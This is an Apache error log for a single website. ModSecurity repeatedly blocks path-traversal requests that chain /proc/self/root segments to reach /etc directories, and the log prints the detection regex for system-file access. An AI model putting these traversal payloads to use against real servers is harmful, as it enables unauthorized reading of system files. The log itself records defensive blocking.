[Fri Mar 20 07:57:09.383580 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:48630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0oBRCii7xarUs8iHZn1AAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:57:12.847867 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:49202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0oCOoXxyEfFpUF8f-A6AAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:57:36.821682 2026] [mime_magic:error] [pid 15826:tid 140411548894976] (70014)End of file found: [client 74.7.243.128:49224] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/udev
[Fri Mar 20 07:57:54.940352 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:57898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0oMl1pVZ5mVmJwsFMxFAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:58:44.887652 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:60824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0oZPXLqtnMIWvjpaKbFgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:00:53.435235 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:55936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o5fqxLDW4GITHUkTnjgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:00:56.257206 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:49768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o6DJ3M9BSuKP7CAYb2wAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:00:57.709632 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:55886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o6da6ubjKNq_cu4bVYAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:01.157910 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:55900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o7fXLqtnMIWvjpaKbbwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:01:03.793828 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:55906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o7-oXxyEfFpUF8f-BXQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:01:06.018321 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:50330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o8l1pVZ5mVmJwsFMx4QAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:06.070406 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.241.31:55912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o8vqxLDW4GITHUkTnlgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:07.487471 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:40576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o89a6ubjKNq_cu4bVYwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:08.821230 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:40582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o9PXLqtnMIWvjpaKbdAAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:10.278574 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.241.31:40598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o9rninkcc-iUj5Ape-QAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:11.631828 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:40612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o9zJ3M9BSuKP7CAYb6AAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:13.112196 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:40622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o-TJ3M9BSuKP7CAYb7QAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:01:14.215287 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:50334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o-gF0L0L-SsrnPo5pXAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:01:15.620397 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.241.31:40630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o-11pVZ5mVmJwsFMx5AAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:18.663730 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:34396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0o_jJ3M9BSuKP7CAYb9AAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:01:20.090886 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:40634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pAPqxLDW4GITHUkTnngAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:01:24.112507 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:54408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pBPqxLDW4GITHUkTnqAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:01:32.159302 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:54422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pDF1pVZ5mVmJwsFMx8wAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
